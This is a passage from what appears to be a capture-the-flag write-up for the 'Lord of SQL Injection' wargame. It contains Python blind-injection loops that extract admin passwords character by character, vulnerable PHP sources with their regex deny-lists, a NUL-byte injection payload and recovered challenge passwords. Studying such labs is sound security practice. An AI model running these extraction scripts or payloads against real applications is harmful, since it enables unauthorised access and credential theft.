# "orc": recover the admin password one position at a time.  Each request is a
# single true/false probe — the challenge page answers "Hello admin" only when
# the guessed character at that position is right, so the response body acts
# as a boolean oracle.  `payload`, `cookie` and `temp` are defined earlier in
# the script (outside this excerpt); `payload` is presumably a format string
# with two slots (position, character code) — confirm against its definition.
for position in range(1, 21):
    for candidate in string.printable:
        probe_url = (
            "https://los.rubiya.kr/chall/orc_60e5b360f95c1f9688e4f3a86c5dd494.php"
            "?pw=" + payload.format(position, ord(candidate))
        )
        response = requests.get(
            probe_url,
            cookies=cookie,
            # Requests are routed through a local intercepting proxy on :8080;
            # verify=False switches off TLS certificate validation for them.
            proxies={'https': 'http://127.0.0.1:8080', 'http': 'http://127.0.0.1:8080'},
            verify=False,
        )
        if "Hello admin" in response.text:
            temp += candidate
            print(temp)
            break
# "orge": same character-by-character oracle as the previous level, against a
# different endpoint.  Relies on `payload`, `cookie` and `temp` from earlier in
# the script; `temp` accumulates the recovered prefix and is printed after each
# confirmed character.
for idx in range(20):
    for guess in string.printable:
        reply = requests.get(
            "https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php"
            "?pw=" + payload.format(idx + 1, ord(guess)),
            cookies=cookie,
            # Local intercepting proxy; certificate validation is disabled.
            proxies={'https': 'http://127.0.0.1:8080', 'http': 'http://127.0.0.1:8080'},
            verify=False,
        )
        matched = "Hello admin" in reply.text
        if matched:
            temp += guess
            print(temp)
            break
# "golem": as above, but the candidate character itself (not its code point)
# is substituted into `payload`.  `payload`, `cookie` and `temp` come from
# earlier in the script.
for pos in range(1, 21):
    for ch in string.printable:
        target = (
            "https://los.rubiya.kr/chall/golem_4b5202cfedd8160e73124b5234235ef5.php"
            "?pw=" + payload.format(pos, ch)
        )
        # Traffic goes through a local proxy on 127.0.0.1:8080 with TLS
        # verification turned off.
        resp = requests.get(
            target,
            cookies=cookie,
            proxies={'https': 'http://127.0.0.1:8080', 'http': 'http://127.0.0.1:8080'},
            verify=False,
        )
        if "Hello admin" in resp.text:
            temp += ch
            print(temp)
            break
最后得到 admin 的 pw 为:77d6290b
12. darkknight
<?php
// "darkknight" challenge source, as shown by highlight_file() at the bottom.
// Both `pw` and `no` come straight from the query string and are spliced into
// SQL text; regex deny-lists are the only control in front of the query.
include "./config.php";
login_chk();
$db = dbconnect();
// Deny-list on `no`: table-name prefix, `_`, `.` and `()` first, then quote,
// substr, ascii and `=`.  `no` is interpolated unquoted below, so SQL context
// is reached without a quote — the second list is all that applies to it.
if (preg_match('/prob|_|\.|\(\)/i', $_GET[no])) exit("No Hack ~_~");
// `pw` is only checked for a single quote.
if (preg_match('/\'/i', $_GET[pw])) exit("HeHe");
if (preg_match('/\'|substr|ascii|=/i', $_GET[no])) exit("HeHe");
// Bareword keys ($_GET[no], $_GET[pw]) rely on PHP's undefined-constant
// fallback to the string 'no'/'pw': a notice before PHP 8, an Error on PHP 8+.
$query = "select id from prob_darkknight where id='guest' and pw='{$_GET[pw]}' and no={$_GET[no]}";
// The assembled query is echoed back and the "Hello <id>" line depends on the
// result, so each request reveals whether the WHERE clause matched a row.
// The `@` hides mysqli errors but does not remove that signal: a failed query
// and a non-matching one both simply print no greeting.
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db, $query));
if ($result['id']) echo "<h2>Hello {$result[id]}</h2>";
// Second query is escaped with addslashes(); solving requires the submitted pw
// to equal the stored admin pw (loose == comparison), so the level is about
// recovering that value rather than bypassing the first query.
$_GET[pw] = addslashes($_GET[pw]);
$query = "select pw from prob_darkknight where id='admin' and pw='{$_GET[pw]}'";
$result = @mysqli_fetch_array(mysqli_query($db, $query));
if (($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("darkknight");
// Mitigation (deliberately absent here — this is the challenge as served):
// a prepared statement with bound parameters, and an (int) cast on `no`.
highlight_file(__FILE__);
?>
# "darkknight": the oracle is inverted relative to the earlier levels — a
# character is accepted when "Hello admin" is ABSENT from the response.  The
# probe goes into the `no` parameter with `pw=1` fixed.  `payload`, `cookie`
# and `temp` are defined earlier in the script.
for pos in range(1, 21):
    for ch in string.printable:
        r = requests.get(
            "https://los.rubiya.kr/chall/darkknight_5cfbc71e68e09f1b039a8204d1a81456.php"
            "?pw=1&no=" + payload.format(pos, ord(ch)),
            cookies=cookie,
            # Local intercepting proxy; TLS certificate validation disabled.
            proxies={'https': 'http://127.0.0.1:8080', 'http': 'http://127.0.0.1:8080'},
            verify=False,
        )
        if "Hello admin" in r.text:
            continue
        temp += ch
        print(temp)
        break
得到 admin 的 pw 为:0b70ea1f
13. bugbear
<?php
// "bugbear" challenge source, as shown by highlight_file() at the bottom.
// Structure is identical to darkknight; the difference is a longer deny-list
// on `no`, which now also rejects `or`, `and`, the space character, `like`
// and the `0x` hex prefix.
include "./config.php";
login_chk();
$db = dbconnect();
if (preg_match('/prob|_|\.|\(\)/i', $_GET[no])) exit("No Hack ~_~");
// `pw` is only checked for a single quote.
if (preg_match('/\'/i', $_GET[pw])) exit("HeHe");
// `no` is interpolated unquoted into the query, so this list — not quoting —
// is the only thing between the parameter and SQL syntax.
if (preg_match('/\'|substr|ascii|=|or|and| |like|0x/i', $_GET[no])) exit("HeHe");
// Bareword keys ($_GET[no], $_GET[pw]) rely on PHP's undefined-constant
// fallback: a notice before PHP 8, an Error on PHP 8+.
$query = "select id from prob_bugbear where id='guest' and pw='{$_GET[pw]}' and no={$_GET[no]}";
// Echoed query plus a result-dependent "Hello <id>" line: every request tells
// the client whether the WHERE clause matched.  `@` only silences mysqli
// errors; it does not remove that one-bit signal.
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db, $query));
if ($result['id']) echo "<h2>Hello {$result[id]}</h2>";
// Second query is addslashes()-escaped; the level is solved only when the
// submitted pw equals the stored admin pw (loose == comparison).
$_GET[pw] = addslashes($_GET[pw]);
$query = "select pw from prob_bugbear where id='admin' and pw='{$_GET[pw]}'";
$result = @mysqli_fetch_array(mysqli_query($db, $query));
if (($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("bugbear");
// Mitigation (absent by design here): prepared statement with bound
// parameters and an (int) cast on `no`; a growing deny-list is not a fix.
highlight_file(__FILE__);
?>
# "bugbear": same shape as the darkknight script (probe in `no`, `pw=1`), but
# the raw candidate character is substituted into `payload` and the oracle is
# the normal one — "Hello admin" present means the guess was right.
# `payload`, `cookie` and `temp` come from earlier in the script.
for index in range(20):
    position = index + 1
    for letter in string.printable:
        page = requests.get(
            "https://los.rubiya.kr/chall/bugbear_19ebf8c8106a5323825b5dfa1b07ac1f.php"
            "?pw=1&no=" + payload.format(position, letter),
            cookies=cookie,
            # Local intercepting proxy; TLS certificate validation disabled.
            proxies={'https': 'http://127.0.0.1:8080', 'http': 'http://127.0.0.1:8080'},
            verify=False,
        ).text
        if "Hello admin" in page:
            temp += letter
            print(temp)
            break
<?php
// "nightmare" challenge source, as shown by highlight_file() at the bottom.
// `pw` is deny-listed (prob, _, ., (), # and -) and capped at 6 characters,
// then placed inside pw=('...'); the parentheses constrain which inputs are
// still syntactically valid SQL.
include "./config.php";
login_chk();
$db = dbconnect();
if (preg_match('/prob|_|\.|\(\)|#|-/i', $_GET[pw])) exit("No Hack ~_~");
// Length check is on bytes (strlen), so a trailing NUL byte counts as one
// character like any other.
if (strlen($_GET[pw]) > 6) exit("No Hack ~_~");
// Bareword key $_GET[pw] relies on PHP's undefined-constant fallback: a notice
// before PHP 8, an Error on PHP 8+.
$query = "select id from prob_nightmare where pw=('{$_GET[pw]}') and id!='admin'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db, $query));
// Any returned row solves the level; the only thing keeping the admin row out
// is the trailing `and id!='admin'`.  Neither the length cap nor the
// deny-list substitutes for a parameterised query.
if ($result['id']) solve("nightmare");
highlight_file(__FILE__);
?>
Payload:?pw=%27)=0;%00
MySQL 的连等从左到右依次计算：select id from prob_nightmare where pw=('')=0; 中，先算 pw='' 为 false，然后 0 也为 false，false==false 成立，所以最终语句等价于 select id from prob_nightmare where pw=true，即可绕过。payload 中 ')=0; 加上 %00 共 6 个字节，刚好满足 strlen 不超过 6 的限制；%00 之后原本的 and id!='admin' 便不再参与判断。
19. xavis
<?php
// "xavis" challenge source, as shown by highlight_file() at the bottom.
// `pw` is spliced directly into the WHERE clause; the deny-list rejects prob,
// _, ., () and the regex/like operators and nothing else (quotes are allowed).
include "./config.php";
login_chk();
$db = dbconnect();
if (preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
if (preg_match('/regex|like/i', $_GET[pw])) exit("HeHe");
// Bareword key $_GET[pw] relies on PHP's undefined-constant fallback: a notice
// before PHP 8, an Error on PHP 8+.
$query = "select id from prob_xavis where id='admin' and pw='{$_GET[pw]}'";
// Echoed query plus a result-dependent "Hello <id>" line: each request reveals
// whether the clause matched the admin row.  `@` hides mysqli errors only; it
// does not remove that signal.
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db, $query));
if ($result['id']) echo "<h2>Hello {$result[id]}</h2>";
// Second query is addslashes()-escaped; the level is solved only when the
// submitted pw equals the stored admin pw (loose == comparison).
$_GET[pw] = addslashes($_GET[pw]);
$query = "select pw from prob_xavis where id='admin' and pw='{$_GET[pw]}'";
$result = @mysqli_fetch_array(mysqli_query($db, $query));
if (($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("xavis");
// Mitigation (absent by design here): prepared statement with bound
// parameters instead of string interpolation plus a deny-list.
highlight_file(__FILE__);
?>